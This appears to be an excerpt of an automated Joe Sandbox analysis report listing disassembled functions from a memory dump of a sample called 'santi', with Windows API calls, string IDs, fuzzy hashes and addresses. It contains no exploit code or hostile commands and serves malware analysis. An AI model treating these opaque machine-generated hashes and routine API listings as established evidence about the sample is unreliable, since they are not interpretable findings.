                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$LongWindow_memset
                                                                • String ID:
                                                                • API String ID: 830647256-0
                                                                • Opcode ID: 8b2f9ec55b91bf68589ab2c8d216eaf1be65c52311003d3ffb30fe6b1e670a7b
                                                                • Instruction ID: 79b94347ad150faa17f88ecec47c4fa84fbbc96319515bfc26e8724e564d761a
                                                                • Opcode Fuzzy Hash: 8b2f9ec55b91bf68589ab2c8d216eaf1be65c52311003d3ffb30fe6b1e670a7b
                                                                • Instruction Fuzzy Hash: 52614975900208AFDB22DFA8CC81EEEB7F8EB09714F14415AFA15EB2A1D774AD41DB50
                                                                Function 003194E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 003194FE
                                                                • SafeArrayAllocData.OLEAUT32(?), ref: 00319549
                                                                • VariantInit.OLEAUT32(?), ref: 0031955B
                                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 0031957B
                                                                • VariantCopy.OLEAUT32(?,?), ref: 003195BE
                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 003195D2
                                                                • VariantClear.OLEAUT32(?), ref: 003195E7
                                                                • SafeArrayDestroyData.OLEAUT32(?), ref: 003195F4
                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003195FD
                                                                • VariantClear.OLEAUT32(?), ref: 0031960F
                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0031961A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                • String ID:
                                                                • API String ID: 2706829360-0
                                                                • Opcode ID: 5a34ff93fc556e1fef9a31650e757ca2f922c251d55afd0e1ece1b75dbf30a1d
                                                                • Instruction ID: 2ddc4979721d793ba10e370250d34f3056fbaa94ad19b51a4303e3327ba83d1e
                                                                • Opcode Fuzzy Hash: 5a34ff93fc556e1fef9a31650e757ca2f922c251d55afd0e1ece1b75dbf30a1d
                                                                • Instruction Fuzzy Hash: DE412C31E00219AFCB06DFA5DC54AEEBB79FF08354F108066E502A7251DF74AA95CBA1
                                                                Function 0033BB08 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 264COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Variant$ClearInit$_memset
                                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$h?9$|?9
                                                                • API String ID: 2862541840-2994141935
                                                                • Opcode ID: 71d73dae5c89e6ab51b37b8e84243e6574ccd93d0fab7af05786c9619adacf06
                                                                • Instruction ID: 03d576d0f91c47ee6b7f494645ed3af3a4900fb2b81a4bf65c96f255733f50ae
                                                                • Opcode Fuzzy Hash: 71d73dae5c89e6ab51b37b8e84243e6574ccd93d0fab7af05786c9619adacf06
                                                                • Instruction Fuzzy Hash: 84919071A00219EBDF26DF95C884FAEFBB8EF45710F118159F615AB280DB709944CFA0
                                                                Function 0033ADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 002E936C: __swprintf.LIBCMT ref: 002E93AB
                                                                  • Part of subcall function 002E936C: __itow.LIBCMT ref: 002E93DF
                                                                • CoInitialize.OLE32 ref: 0033ADF6
                                                                • CoUninitialize.OLE32 ref: 0033AE01
                                                                • CoCreateInstance.OLE32(?,00000000,00000017,0036D8FC,?), ref: 0033AE61
                                                                • IIDFromString.OLE32(?,?), ref: 0033AED4
                                                                • VariantInit.OLEAUT32(?), ref: 0033AF6E
                                                                • VariantClear.OLEAUT32(?), ref: 0033AFCF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                • API String ID: 834269672-1287834457
                                                                • Opcode ID: 931a6e7fc5cf59214048555c6aae3bad1120e2dcb7e09512784f6529b21547ea
                                                                • Instruction ID: 97dc70c00890fca3a846e4b753403ce63400634b5310c59d2914ed88a3a27fa1
                                                                • Opcode Fuzzy Hash: 931a6e7fc5cf59214048555c6aae3bad1120e2dcb7e09512784f6529b21547ea
                                                                • Instruction Fuzzy Hash: A5619C71608B11AFD712DF54C888B6AB7E8AF89714F10451DF9859B2A1C770ED48CB93
                                                                Function 00338107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • WSAStartup.WSOCK32(00000101,?), ref: 00338168
                                                                • inet_addr.WSOCK32(?,?,?), ref: 003381AD
                                                                • gethostbyname.WSOCK32(?), ref: 003381B9
                                                                • IcmpCreateFile.IPHLPAPI ref: 003381C7
                                                                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00338237
                                                                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0033824D
                                                                • IcmpCloseHandle.IPHLPAPI(00000000), ref: 003382C2
                                                                • WSACleanup.WSOCK32 ref: 003382C8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                • String ID: Ping
                                                                • API String ID: 1028309954-2246546115
                                                                • Opcode ID: 90ce1dcea453b35f423c81c242839dbb980a7814bdf76843ada16b44a2a0064c
                                                                • Instruction ID: 6042d353de98af494e5179aa43cbcc8a4fce83dd1f6af226fb490deca80834a1
                                                                • Opcode Fuzzy Hash: 90ce1dcea453b35f423c81c242839dbb980a7814bdf76843ada16b44a2a0064c
                                                                • Instruction Fuzzy Hash: A15191316047009FDB22AF64CC85B6BB7E8EF49710F058969FA55DB2A1DB70E905CB42
                                                                Function 0032E389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetErrorMode.KERNEL32(00000001), ref: 0032E396
                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0032E40C
                                                                • GetLastError.KERNEL32 ref: 0032E416
                                                                • SetErrorMode.KERNEL32(00000000,READY), ref: 0032E483
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                • API String ID: 4194297153-14809454
                                                                • Opcode ID: 1936b8ea3206cb7cf51aa09da7189a916dbf9e0569548c47b99edb8707679541
                                                                • Instruction ID: 3de192696646520f422b4b1ccd2a5e64d971acfa01156a215cbe897796f222c5
                                                                • Opcode Fuzzy Hash: 1936b8ea3206cb7cf51aa09da7189a916dbf9e0569548c47b99edb8707679541
                                                                • Instruction Fuzzy Hash: 6331A635A402159FDB03FFA9EC46EAD77B8EF18304F148015E506EB291DB71AE01CB51
                                                                Function 0031B907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0031B98C
                                                                • GetDlgCtrlID.USER32 ref: 0031B997
                                                                • GetParent.USER32 ref: 0031B9B3
                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 0031B9B6
                                                                • GetDlgCtrlID.USER32(?), ref: 0031B9BF
                                                                • GetParent.USER32(?), ref: 0031B9DB
                                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 0031B9DE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$CtrlParent
                                                                • String ID: ComboBox$ListBox
                                                                • API String ID: 1383977212-1403004172
                                                                • Opcode ID: 740e2be5da80ba9b0391c6a8e6152803e9d1cebf8d5d97c9fdc5b0dd55d5d8e3
                                                                • Instruction ID: 8f787b498b550de767a5d5fd7c8730186b3fde6abb3c677c84876511641f9400
                                                                • Opcode Fuzzy Hash: 740e2be5da80ba9b0391c6a8e6152803e9d1cebf8d5d97c9fdc5b0dd55d5d8e3
                                                                • Instruction Fuzzy Hash: 8E21C174A00104BFCF0AABA5CC86EFEBB79EB4A300F504119F651972A1DBB558669B20
                                                                Function 0031B9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0031BA73
                                                                • GetDlgCtrlID.USER32 ref: 0031BA7E
                                                                • GetParent.USER32 ref: 0031BA9A
                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 0031BA9D
                                                                • GetDlgCtrlID.USER32(?), ref: 0031BAA6
                                                                • GetParent.USER32(?), ref: 0031BAC2
                                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 0031BAC5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$CtrlParent
                                                                • String ID: ComboBox$ListBox
                                                                • API String ID: 1383977212-1403004172
                                                                • Opcode ID: e3c88d988789f718cbfbd3a61879cd9b48c725152ee717f5e4b5c162642262c9
                                                                • Instruction ID: 619b32aa4ad6113a0f296a6c19a5f8116ae7640e99e933f9c59f114a41c471bc
                                                                • Opcode Fuzzy Hash: e3c88d988789f718cbfbd3a61879cd9b48c725152ee717f5e4b5c162642262c9
                                                                • Instruction Fuzzy Hash: CD21F2B4A40108BFDF06ABA4CC85EFEBB79EF49300F504019F551A72A1DBB5586ADF20
                                                                Function 0031BAD7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetParent.USER32 ref: 0031BAE3
                                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 0031BAF8
                                                                • _wcscmp.LIBCMT ref: 0031BB0A
                                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0031BB85
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ClassMessageNameParentSend_wcscmp
                                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                • API String ID: 1704125052-3381328864
                                                                • Opcode ID: d04209926acea97347a4efa72a02598ed74d34d2ba5e71620167e2ff24374f3f
                                                                • Instruction ID: 39e24ec5f284a259b5a14b9cc4201eab2a6834843477381364ea100dc3c6cf01
                                                                • Opcode Fuzzy Hash: d04209926acea97347a4efa72a02598ed74d34d2ba5e71620167e2ff24374f3f
                                                                • Instruction Fuzzy Hash: F3110A7760C303FAFA2B7624DC16DE7B79C9B19720F204011F904E54D5EFA158915514
                                                                Function 0033B2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VariantInit.OLEAUT32(?), ref: 0033B2D5
                                                                • CoInitialize.OLE32(00000000), ref: 0033B302
                                                                • CoUninitialize.OLE32 ref: 0033B30C
                                                                • GetRunningObjectTable.OLE32(00000000,?), ref: 0033B40C
                                                                • SetErrorMode.KERNEL32(00000001,00000029), ref: 0033B539
                                                                • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0033B56D
                                                                • CoGetObject.OLE32(?,00000000,0036D91C,?), ref: 0033B590
                                                                • SetErrorMode.KERNEL32(00000000), ref: 0033B5A3
                                                                • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0033B623
                                                                • VariantClear.OLEAUT32(0036D91C), ref: 0033B633
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                • String ID:
                                                                • API String ID: 2395222682-0
                                                                • Opcode ID: 73105622f2a114535e7daae3c2bc2bd81605a0644b203f774ad0ce2392735406
                                                                • Instruction ID: 6e81b622473400d7a48b644020ea8858c7d22f912068ee8b325ee318ac180e9f
                                                                • Opcode Fuzzy Hash: 73105622f2a114535e7daae3c2bc2bd81605a0644b203f774ad0ce2392735406
                                                                • Instruction Fuzzy Hash: F3C12271608305AFD701DF69C884A6BB7E9FF89308F00491DFA8A9B251DB71ED05CB62
                                                                Function 00324025 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetCurrentThreadId.KERNEL32 ref: 00324047
                                                                • GetForegroundWindow.USER32(00000000,?,?,?,?,?,003230A5,?,00000001), ref: 0032405B
                                                                • GetWindowThreadProcessId.USER32(00000000), ref: 00324062
                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003230A5,?,00000001), ref: 00324071
                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 00324083
                                                                • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,003230A5,?,00000001), ref: 0032409C
                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003230A5,?,00000001), ref: 003240AE
                                                                • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,003230A5,?,00000001), ref: 003240F3
                                                                • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,003230A5,?,00000001), ref: 00324108
                                                                • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,003230A5,?,00000001), ref: 00324113
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                • String ID:
                                                                • API String ID: 2156557900-0
                                                                • Opcode ID: 9bc0de67a4df381043fe67c9bdbfac724c17f1d51065dc7f0a42b797b6a860fa
                                                                • Instruction ID: 3ac34ebe1b5909f68dd15bc235728421a2781ab45589c472c7c81b97d91b53aa
                                                                • Opcode Fuzzy Hash: 9bc0de67a4df381043fe67c9bdbfac724c17f1d51065dc7f0a42b797b6a860fa
                                                                • Instruction Fuzzy Hash: DC31A271A00224BFDB13DF54EC89B69B7ADBB55721F11C015F905E6290DBB4ED808B60
                                                                Function 0035DD4A Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetSysColor.USER32(00000008), ref: 002FB496
                                                                • SetTextColor.GDI32(?,000000FF), ref: 002FB4A0
                                                                • SetBkMode.GDI32(?,00000001), ref: 002FB4B5
                                                                • GetStockObject.GDI32(00000005), ref: 002FB4BD
                                                                • GetClientRect.USER32(?), ref: 0035DD63
                                                                • SendMessageW.USER32(?,00001328,00000000,?), ref: 0035DD7A
                                                                • GetWindowDC.USER32(?), ref: 0035DD86
                                                                • GetPixel.GDI32(00000000,?,?), ref: 0035DD95
                                                                • ReleaseDC.USER32(?,00000000), ref: 0035DDA7
                                                                • GetSysColor.USER32(00000005), ref: 0035DDC5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                • String ID:
                                                                • API String ID: 3430376129-0
                                                                • Opcode ID: 99b78c59bec674b782edf3d196134b63a7297046b5a0047000376c98e7a70d27
                                                                • Instruction ID: a0f3bf06381e6d5d7c6dc8d1a6b4ffc2d647210f0ca9d449b1e907ae8225794a
                                                                • Opcode Fuzzy Hash: 99b78c59bec674b782edf3d196134b63a7297046b5a0047000376c98e7a70d27
                                                                • Instruction Fuzzy Hash: A3118E31A00205EFDB636FA4EC08FA97FB9EB09365F118221FA66950F1CBB14951DF21
                                                                Function 002E3093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 002E30DC
                                                                • CoUninitialize.OLE32(?,00000000), ref: 002E3181
                                                                • UnregisterHotKey.USER32(?), ref: 002E32A9
                                                                • DestroyWindow.USER32(?), ref: 00355079
                                                                • FreeLibrary.KERNEL32(?), ref: 003550F8
                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00355125
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                • String ID: close all
                                                                • API String ID: 469580280-3243417748
                                                                • Opcode ID: b102de358f30364f770644d337cccee39f1cb4f879a11905e6fca8c96dc7afb3
                                                                • Instruction ID: 3b3107065166e657398c6627020067f5ff2de59c9e9ec92d499b9b73adfea227
                                                                • Opcode Fuzzy Hash: b102de358f30364f770644d337cccee39f1cb4f879a11905e6fca8c96dc7afb3
                                                                • Instruction Fuzzy Hash: A9914030660182CFC716EF15C899F68F3A4FF05306F9581ADE50A67262DB70AE2ACF50
                                                                Function 002FCB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetWindowLongW.USER32(?,000000EB), ref: 002FCC15
                                                                  • Part of subcall function 002FCCCD: GetClientRect.USER32(?,?), ref: 002FCCF6
                                                                  • Part of subcall function 002FCCCD: GetWindowRect.USER32(?,?), ref: 002FCD37
                                                                  • Part of subcall function 002FCCCD: ScreenToClient.USER32(?,?), ref: 002FCD5F
                                                                • GetDC.USER32 ref: 0035D137
                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0035D14A
                                                                • SelectObject.GDI32(00000000,00000000), ref: 0035D158
                                                                • SelectObject.GDI32(00000000,00000000), ref: 0035D16D
                                                                • ReleaseDC.USER32(?,00000000), ref: 0035D175
                                                                • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0035D200
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                • String ID: U
                                                                • API String ID: 4009187628-3372436214
                                                                • Opcode ID: d9d88dbfdcef1b928651dac8fde9e89584a3ab7f140ca38952c0afaa428a9040
                                                                • Instruction ID: 7f76c3cf81ea2d2319d2d69f2c3584508ae8b9b61cbd9f8086b45b341ff8012d
                                                                • Opcode Fuzzy Hash: d9d88dbfdcef1b928651dac8fde9e89584a3ab7f140ca38952c0afaa428a9040
                                                                • Instruction Fuzzy Hash: D771F130500209DFCF329F64C980EBABBB5FF49366F24426AED559A2B6C7308955DF50
                                                                Function 0034ECD4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 002FB34E: GetWindowLongW.USER32(?,000000EB), ref: 002FB35F
